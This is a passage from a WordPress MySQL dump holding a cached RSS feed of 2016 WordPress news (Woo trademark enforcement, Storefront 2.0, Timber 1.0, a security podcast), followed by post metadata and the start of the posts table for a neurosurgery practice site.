+0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:46;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"WPTavern: Automattic is Protecting its Woo, WooThemes, and WooCommerce Trademarks\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54645\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"http://wptavern.com/automattic-is-protecting-its-woo-woothemes-and-woocommerce-trademarks\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6735:\"<p>When <a href=\"http://wptavern.com/automattic-acquires-woocommerce\">Automattic acquired WooThemes in 2015</a>, it gained employees, plugins, themes, and the company’s trademarks. These trademarks include, standard character marks, logos, and specific graphics such as the Verified WooExpert badges. One of the responsibilities of a trademark owner is to protect it from infringement.</p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/VerifiedWooExpertServicemark.png\"><img class=\"size-full wp-image-54702\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/VerifiedWooExpertServicemark.png?resize=1025%2C621\" alt=\"Verified WooExpert Service Mark\" /></a>Verified WooExpert Service Mark\n<p>WooGPL is a service that provides customers with commercial themes, plugins, and extensions for WooCommerce at a discounted rate. In March, Automattic <a href=\"https://woogpl.com/woogpl-is-closing/\">sent Billy Ablett</a>, owner of <a href=\"https://woogpl.com\">WooGPL</a>, the following notice that informs him that his domain infringes the Woo and WooCommerce trademarks.</p>\n<blockquote><p>I’m writing to you on behalf of Automattic Inc. regarding your use of the Woo and WooCommerce trademarks.</p>\n<p>As you may know, Automattic owns the Woo, WooCommerce, and WooThemes brands, as well as the associated trademarks. We recently learned of https://woogpl.com, which actively makes use of our registered trademarks in both its name and promotion. We are very concerned that your use of Woo and WooCommerce will create confusion by communicating that your WooCommerce products are endorsed by or associated with Automattic, when in fact it is not.</p>\n<p>While Automattic appreciates that you are providing products that build on WooCommerce open source software, that fact does not authorize you to use Woo, WooThemes or WooCommerce trademarks.</p>\n<p>To minimize user confusion and to protect our own intellectual property, we unfortunately must insist that you take prompt steps to change your domain name to something that doesn’t include ‘Woo’ in the prefix, and change your product descriptions to avoid confusion and potentially misleading consumers to believe they are purchasing our products. An example of this would be: WooCommerce Email Customiser Pro would need to be changed to Email Customiser Pro for WooCommerce.</p>\n<p>For more information, please see our <a href=\"https://www.woothemes.com/style-guide/#sg-trademarks\">Trademark Guidelines</a>.</p>\n<p>While we are appreciative that you have included a disclaimer on your site, unfortunately this would not be sufficient and we would still insist that the domain name and product names be changed.</p></blockquote>\n<p>While it’s not the sole reason <a href=\"https://woogpl.com/woogpl-is-closing/\">WooGPL is shutting down</a>, the notice provides a convenient opportunity to rebrand to <a href=\"https://www.gplkit.com/\">GPL Kit</a>, something the company was already planning to do.</p>\n<p>“We would have eventually closed down WooGPL due to GPL Kit however, it would have been great to close it down on our terms when the time was right,” Daniel, who is part of the GPL Kit team told the Tavern.</p>\n<p>Daniel says that when he started WooGPL there wasn’t a trademark registered with the Woo character mark until October of 2015.</p>\n<p>A search of the United States Patent and Trademark Office for Woo contains over 1K results. However, this is the only character mark for Woo that I found. The filing date is October 22nd, 2015 and is in the approval process.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/WooCharacterMark.png\"><img class=\"size-full wp-image-54703\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/WooCharacterMark.png?resize=1003%2C557\" alt=\"Woo Character Mark\" /></a>Woo Character Mark\n<h2>When You Should Ask For Permission</h2>\n<p>WooThemes has a <a href=\"https://www.woothemes.com/style-guide/#sg-trademarks\">style guide</a> on its site that explains how the brand is used and has details on when Woo™, WooCommerce®, and WooThemes® names, logos, and related icons collectively known as Woo Marks can be used without permission. The following chart provides some examples.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/PermissionChartForWooTrademarks.png\"><img class=\"size-full wp-image-54704\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/PermissionChartForWooTrademarks.png?resize=1010%2C814\" alt=\"Examples of When You Do and Don\'t Need Permission\" /></a>Examples of When You Do and Don’t Need Permission\n<p>If you’re in doubt, you can email Automattic’s trademark team <a href=\"mailto:trademarks@automattic.com\">trademarks @ automattic.com</a> to receive clarification.</p>\n<h2>Woo’s at Risk?</h2>\n<p>There are quite a few businesses in the WordPress ecosystem that use Woo in their name and domain. <a href=\"http://www.woorockets.com/\">WooRockets</a> is a WooCommerce theme shop while <a href=\"http://wooassist.com/\">WooAssist</a> provides support and maintenance for store owners.</p>\n<p>I reached out to both companies to determine if Automattic sent them the same notice it sent to WooGPL. While I didn’t receive a response from WooRockets, John Gamour of WooAssist provided the Tavern with the following statement:</p>\n<blockquote><p>No, we haven’t been contacted by Automattic about that. It would be dissapointing if we were asked to change our name as our founder Nicholas Jones reached out to WooThemes before starting Wooassist and they gave the OK. We have also worked with Matt Cohen and James Koster on a project and nothing was ever mentioned about our name.</p></blockquote>\n<p>I tried to get in touch with Paul Sieminski, legal counsel for Automattic, to learn what the criteria is for violating the trademarks, who’s at risk, and how long they have enforced the marks but he could not be reached for comment.</p>\n<h2>Better to be Safe Than Sorry</h2>\n<p>As WooGPL discovered, adding a disclaimer to the bottom of your sites may not be enough. Considering the cost and potential impacts of re branding a company or product, it’s important to know as soon as possible if you’re infringing a company’s trademarks.</p>\n<p>Business owners in the WooCommerce and WooThemes ecosystem should double-check the <a href=\"https://www.woothemes.com/style-guide/#sg-trademarks\">style guide</a> to make sure you’re not violating any guidelines. Owners can also take a proactive step and contact Automattic’s trademark team to determine if your business meets the requirements.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 10 May 2016 20:21:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:47;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"WPTavern: WooCommerce Releases Storefront 2.0 with Major Improvements to Mobile Design\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54641\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:96:\"http://wptavern.com/woocommerce-releases-storefront-2-0-with-major-improvements-to-mobile-design\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3509:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/storefront-update.png\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/storefront-update.png?resize=1025%2C451\" alt=\"storefront-update\" class=\"aligncenter size-full wp-image-54669\" /></a></p>\n<p><a href=\"https://wordpress.org/themes/storefront/\" target=\"_blank\">Storefront</a>, the official WooCommerce theme built to work seamlessly with the plugin, has just passed the <a href=\"https://www.woothemes.com/2016/05/storefront-2-0-release/\" target=\"_blank\">2.0 milestone</a>. This release introduces a new “best sellers” section to the homepage and adds compatibility with the upcoming WooCommerce 2.6’s tabbed “My Account” section and the average rating widget.</p>\n<p>The most important update in Storefront 2.0 is the redesigned mobile experience. According to <a href=\"http://resources.mobify.com/50-mobile-commerce-stats.html\" target=\"_blank\">Mobify</a>, 30% of mobile shoppers will abandon a transaction if the experience is not optimized for mobile. <a href=\"http://www.themobileplaybook.com/\" target=\"_blank\">Google’s Mobile Playbook</a> says that not having a mobile optimized website is like closing your store one day each week. To keep pace with the expectations of mobile buyers, WooCommerce has drastically reduced Storefront’s mobile header height by 60% and has added the search, shopping cart, and account links to a sticky bottom menu for easy access.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/storefront-mobile-home.png\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/storefront-mobile-home.png?resize=799%2C697\" alt=\"storefront-mobile-home\" class=\"aligncenter size-full wp-image-54671\" /></a></p>\n<p>Storefront 2.0 includes many design improvements that make the theme cleaner and more flexible. This update removes Helvetica in favor of Source Sans, which WooCommerce says gives them access to a wider variety of weights they can use to “provide greater depth and cohesion.” Other notable design changes include:</p>\n<ul>\n<li>Borders have been largely removed so that pages don’t feel quite so broken up.</li>\n<li>The breadcrumb and the main navigation are now wrapped in their own content regions, cementing them as unique components.</li>\n<li>Product reviews and comments tweaked to make them cleaner and more scannable.</li>\n<li>Blog post meta has been redesigned to include the author Gravatar.</li>\n<li>Softer design treatment for tables with colors based on the main background color.</li>\n<li>oEmbeds have been styled to match the rest of Storefront (including typography, padding, colors).</li>\n<li>Integrated WordPress 4.5’s custom logo feature so users can add a logo without using a plugin.</li>\n</ul>\n<p><a href=\"https://wordpress.org/themes/storefront/\" target=\"_blank\">Storefront</a> is active on more than 50,000 websites. There are nearly a dozen free themes on WordPress.org that use it as a parent theme and another dozen commercial themes on WooThemes.com. If you use a heavily customized Storefront child theme, you may want to test its compatibility with the 2.0 update on a development site to ensure that there are no visual surprises. If you have any ideas or recommendations for updates to Storefront, you can leave feedback on the theme’s <a href=\"http://ideas.woothemes.com/forums/275029-storefront\" target=\"_blank\">idea board</a>.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 May 2016 22:23:17 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:48;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"WPTavern: Timber 1.0 Is Now Available on WordPress.org\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54396\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"http://wptavern.com/timber-1-0-is-now-available-on-wordpress-org\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5932:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/timber.png\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/timber.png?resize=1025%2C405\" alt=\"timber\" class=\"aligncenter size-full wp-image-54630\" /></a></p>\n<p>Last week the creators of <a href=\"https://wordpress.org/plugins/timber-library/\" target=\"_blank\">Timber</a>, the plugin that enables WordPress theme developers to write HTML using the <a href=\"http://twig.sensiolabs.org/\" target=\"_blank\">Twig Template Engine</a>, released version 1.0 on WordPress.org. The plugin is active on more than 10,000 websites where theme authors have elected to keep PHP files separate from HTML. Timber is built on DRY and MVC principles to solve the problem stated in its unofficial tagline: <em>“Because WordPress is awesome, but the_loop isn’t.”</em></p>\n<p>Over the past four years, the open source project has evolved from being a starter theme to a plugin that can be added to existing themes. It is now used on <a href=\"http://upstatement.com/timber/#showcase\" target=\"_blank\">thousands of websites</a> and has 83 <a href=\"https://github.com/timber/timber/graphs/contributors\" target=\"_blank\">contributors</a> listed on GitHub.</p>\n<p>“In 2012 I was getting more into WordPress after doing lots of JS development with <a href=\"http://handlebarsjs.com/\" target=\"_blank\">Handlebars</a> (a JS templating language),” Timber creator Jared Novack said. “I went to WordCamp Providence to learn more about state-of-the-art WordPress ways. I remember thinking: ‘This is great, but I really miss the cleanliness of Handlebars — I wish someone would make something like that for WordPress.’ That’s when I realized, I was that someone.”</p>\n<p>Novack was playing around with <a href=\"http://www.smarty.net/\" target=\"_blank\">Smarty</a> and <a href=\"https://mustache.github.io/\" target=\"_blank\">Mustache</a> before he finally discovered Fabien Potencier’s <a href=\"http://twig.sensiolabs.org/\" target=\"_blank\">Twig project</a>.</p>\n<p>“The syntax felt so natural I almost didn’t need to read the docs (don’t worry, I did),” he said. “I realized what I needed was a way to marry Twig and WordPress, and thus: Timber was born.”</p>\n<p>At that time Novack’s company, <a href=\"https://upstatement.com/\" target=\"_blank\">Upstatement</a>, was beginning development on a big new project for Random House to enable their marketers to generate unique sites from a library of templates. This client project became Timber’s first test case.</p>\n<p>“Originally, Timber was a parent theme, like _s. But after we completed the Random House project, I realized I wanted to apply Timber functionality to existing sites,” Novack said. “I converted it into a plugin that could be employed on existing themes which is the form it takes today.”</p>\n<p>The plugin allows designers skilled with HTML and CSS to create themes without having extensive knowledge of PHP and WordPress functions. Timber successfully powers sites like Michael Bloomberg’s <a href=\"https://www.thetrace.org/\" target=\"_blank\">The Trace</a>, <a href=\"http://everytown.org/\" target=\"_blank\">Everytown for Gun Safety</a>, <a href=\"https://www.hoteltonight.com/\" target=\"_blank\">Hotel Tonight</a>, and the <a href=\"http://harvardlawreview.org/\" target=\"_blank\">Harvard Law Review</a>.</p>\n<h3>Timber 1.0 Puts the Project on the Path of Stability</h3>\n<p>As of Timber 1.0, developers can now include the project as a plugin or require it as a <a href=\"https://packagist.org/packages/timber/timber\" target=\"_blank\">Composer dependency</a>.</p>\n<p>“The big news is that 1.0 represents a maturing of the platform — developers can use Timber and Twig with confidence that they’re building on top of a stable and universal platform,” Novack said.</p>\n<p>This release sheds years of deprecated functions and methods dating back to the project’s early days in 2013. Novack said that technical and documentation debt were the biggest hurdles in getting to 1.0.</p>\n<p>“In hindsight it’s so easy to build stuff, but so hard to build a complete system,” he said. “When Timber started it was just for me and the documentation could just live in my head. I’d add and improve stuff and then live with some of the quirks.”</p>\n<p>As the project and its contributors grew, Novack found it difficult to keep up with the growing codebase while running his company. Bringing it to a place of maturity with up-to-date automated testing and documentation took nearly a year.</p>\n<p>“Backwards compatibility was also a major challenge,” Novack said. “As ideas and new code got submitted, development slowed as every decision might have implications for existing users. We would deprecate features, but I was hesitant to remove things that I knew were mistakes, but that people were using.”</p>\n<p>Developers are encouraged to read the <a href=\"https://github.com/timber/timber/wiki/1.0-Upgrade-Guide\" target=\"_blank\">1.0 Upgrade Guide</a>, as there may be additional steps required depending on how Timber is being used. This release adds a few new features but the most important change is the bulk removal of older sections of the codebase. The upgrade guide outlines all of the object properties and static methods that will need to be updated so that nothing breaks. In the future, Timber-powered themes will be easier to maintain, with fewer quirks and better-documented features.</p>\n<p>“The key learning for me is that the ultimate ‘killer feature’ is stability and predictability,” Novack said. “When everything is organized cleanly and developers can use the things that they would intuitively expect — that’s success.”</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 May 2016 17:52:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:49;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"Post Status: WordPress Security — Draft podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=24378\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://poststatus.com/wordpress-security-draft-podcast/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2296:\"<p>Welcome to the Post Status <a href=\"https://poststatus.com/category/draft\">Draft podcast</a>, which you can find <a href=\"https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008\">on iTunes</a>, <a href=\"http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast\">Stitcher</a>, and <a href=\"http://simplecast.fm/podcasts/1061/rss\">via RSS</a> for your favorite podcatcher. Post Status Draft is hosted by Joe Hoyle — the CTO of Human Made — and Brian Krogsgard.</p>\n<p><span>Security — in WordPress core, distributed plugins and themes, and in our custom code — is a constant battle. It’s important to be vigilant with our security practices, from the perspective of managing our websites and when writing code. In this episode, Joe and Brian discuss the nature of WordPress security, best practices for writing secure code, and dig into various situations WordPress developers and site owners may run into.</span></p>\n<a href=\"https://audio.simplecast.com/37301.mp3\">https://audio.simplecast.com/37301.mp3</a>\n<p><a href=\"http://audio.simplecast.com/37301.mp3\">Direct Download</a></p>\n<h3>Links</h3>\n<ul>\n<li><a href=\"http://codex.wordpress.org/Hardening_WordPress\">Hardening WordPress</a></li>\n<li><a href=\"https://wordpress.org/about/security/\">About WordPress Security</a></li>\n<li><a href=\"https://make.wordpress.org/themes/2015/05/19/a-guide-to-writing-secure-themes-part-1-introduction/\">A Guide to Writing Secure Themes</a></li>\n<li><a href=\"http://ben.lobaugh.net/uploads/writing-secure-plugins-and-themes/#/\">Writing Secure Plugins & Themes</a> by Ben Lobaugh</li>\n<li><a href=\"https://codex.wordpress.org/Class_Reference/wpdb\">$wpdb</a></li>\n<li><a href=\"https://wpvulndb.com/\">WP Scan</a></li>\n<li><a href=\"https://blog.sucuri.net/2015/03/understanding-wordpress-plugin-vulnerabilities.html\">Understanding Vulnerabilities</a></li>\n</ul>\n<h3>Sponsor: Pagely</h3>\n<p><a href=\"https://pagely.com\"><span>Pagely</span></a><span> offers best in class managed WordPress hosting, powered by the Amazon Cloud, the Internet’s most reliable infrastructure. Post Status is proudly hosted by Pagely. Thank you to </span><a href=\"https://pagely.com\"><span>Pagely</span></a><span> for being a Post Status partner.</span></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 May 2016 01:01:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Katie Richards\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:10:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Sun, 24 Jul 2016 18:00:02 GMT\";s:12:\"content-type\";s:8:\"text/xml\";s:14:\"content-length\";s:6:\"252364\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:13:\"last-modified\";s:29:\"Sun, 24 Jul 2016 17:45:13 GMT\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 250\";s:13:\"accept-ranges\";s:5:\"bytes\";}s:5:\"build\";s:14:\"20140615032736\";}','no'); /*!40000 ALTER TABLE `wp_options` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_postmeta` -- DROP TABLE IF EXISTS `wp_postmeta`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_postmeta` ( `meta_id` bigint(20) unsigned NOT NULL auto_increment, `post_id` bigint(20) unsigned NOT NULL default '0', `meta_key` varchar(255) default NULL, `meta_value` longtext, PRIMARY KEY (`meta_id`), KEY `post_id` (`post_id`), KEY `meta_key` (`meta_key`) ) ENGINE=MyISAM AUTO_INCREMENT=91 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_postmeta` -- LOCK TABLES `wp_postmeta` WRITE; /*!40000 ALTER TABLE `wp_postmeta` DISABLE KEYS */; INSERT INTO `wp_postmeta` VALUES (1,2,'_wp_page_template','default'),(5,9,'_edit_lock','1455071564:1'),(6,9,'_wp_page_template','template-full-width.php'),(4,9,'_edit_last','1'),(7,9,'page_sub_title',''),(8,11,'_edit_last','1'),(9,11,'_edit_lock','1455072723:1'),(10,11,'_wp_page_template','template-full-width.php'),(11,11,'page_sub_title',''),(12,13,'_edit_last','1'),(13,13,'_edit_lock','1403043483:1'),(14,13,'_wp_page_template','template-contact.php'),(15,13,'page_sub_title',''),(16,15,'_edit_last','1'),(17,15,'_wp_page_template','template-full-width.php'),(18,15,'page_sub_title',''),(19,15,'_edit_lock','1403047286:1'),(20,17,'_edit_last','1'),(21,17,'_wp_page_template','template-full-width.php'),(22,17,'page_sub_title',''),(23,17,'_edit_lock','1403043218:1'),(24,19,'_menu_item_type','post_type'),(25,19,'_menu_item_menu_item_parent','0'),(26,19,'_menu_item_object_id','17'),(27,19,'_menu_item_object','page'),(28,19,'_menu_item_target',''),(29,19,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30,19,'_menu_item_xfn',''),(31,19,'_menu_item_url',''),(33,20,'_menu_item_type','post_type'),(34,20,'_menu_item_menu_item_parent','0'),(35,20,'_menu_item_object_id','15'),(36,20,'_menu_item_object','page'),(37,20,'_menu_item_target',''),(38,20,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(39,20,'_menu_item_xfn',''),(40,20,'_menu_item_url',''),(42,21,'_menu_item_type','post_type'),(43,21,'_menu_item_menu_item_parent','0'),(44,21,'_menu_item_object_id','13'),(45,21,'_menu_item_object','page'),(46,21,'_menu_item_target',''),(47,21,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(48,21,'_menu_item_xfn',''),(49,21,'_menu_item_url',''),(51,22,'_menu_item_type','post_type'),(52,22,'_menu_item_menu_item_parent','0'),(53,22,'_menu_item_object_id','11'),(54,22,'_menu_item_object','page'),(55,22,'_menu_item_target',''),(56,22,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57,22,'_menu_item_xfn',''),(58,22,'_menu_item_url',''),(69,25,'_menu_item_type','post_type'),(60,23,'_menu_item_type','post_type'),(61,23,'_menu_item_menu_item_parent','0'),(62,23,'_menu_item_object_id','9'),(63,23,'_menu_item_object','page'),(64,23,'_menu_item_target',''),(65,23,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(66,23,'_menu_item_xfn',''),(67,23,'_menu_item_url',''),(68,23,'_menu_item_orphaned','1402805134'),(70,25,'_menu_item_menu_item_parent','0'),(71,25,'_menu_item_object_id','9'),(72,25,'_menu_item_object','page'),(73,25,'_menu_item_target',''),(74,25,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(75,25,'_menu_item_xfn',''),(76,25,'_menu_item_url',''),(89,11,'_yoast_wpseo_metadesc','Dr. Jacob Chodakiewitz, M.D., is a Stereotactic Neurosurgeon with a specialty in the field of Functional Neurosurgery. He has 28 years of experience performing stereotactic, neurosurgical procedures for the control of chronic intractable pain and tremor. '),(88,11,'_yoast_wpseo_focuskw','Dr. Chodakiewitz'),(87,11,'_yoast_wpseo_focuskw_text_input','Dr. Chodakiewitz'),(90,11,'_yoast_wpseo_linkdex','41'); /*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_posts` -- DROP TABLE IF EXISTS `wp_posts`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_posts` ( `ID` bigint(20) unsigned NOT NULL auto_increment, `post_author` bigint(20) unsigned NOT NULL default '0', `post_date` datetime NOT NULL default '0000-00-00 00:00:00', `post_date_gmt` datetime NOT NULL default '0000-00-00 00:00:00', `post_content` longtext NOT NULL, `post_title` text NOT NULL, `post_excerpt` text NOT NULL, `post_status` varchar(20) NOT NULL default 'publish', `comment_status` varchar(20) NOT NULL default 'open', `ping_status` varchar(20) NOT NULL default 'open', `post_password` varchar(20) NOT NULL default '', `post_name` varchar(200) NOT NULL default '', `to_ping` text NOT NULL, `pinged` text NOT NULL, `post_modified` datetime NOT NULL default '0000-00-00 00:00:00', `post_modified_gmt` datetime NOT NULL default '0000-00-00 00:00:00', `post_content_filtered` longtext NOT NULL, `post_parent` bigint(20) unsigned NOT NULL default '0', `guid` varchar(255) NOT NULL default '', `menu_order` int(11) NOT NULL default '0', `post_type` varchar(20) NOT NULL default 'post', `post_mime_type` varchar(100) NOT NULL default '', `comment_count` bigint(20) NOT NULL default '0', PRIMARY KEY (`ID`), KEY `post_name` (`post_name`), KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`), KEY `post_parent` (`post_parent`), KEY `post_author` (`post_author`) ) ENGINE=MyISAM AUTO_INCREMENT=49 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_posts` -- LOCK TABLES `wp_posts` WRITE; /*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */; INSERT INTO `wp_posts` VALUES (1,1,'2014-06-15 03:27:39','2014-06-15 03:27:39','Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!','Hello world!','','publish','open','open','','hello-world','','','2014-06-15 03:27:39','2014-06-15 03:27:39','',0,'http://0002df5.rcomhost.com//Neuro/?p=1',0,'post','',1),(2,1,'2014-06-15 03:27:39','2014-06-15 03:27:39','This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like 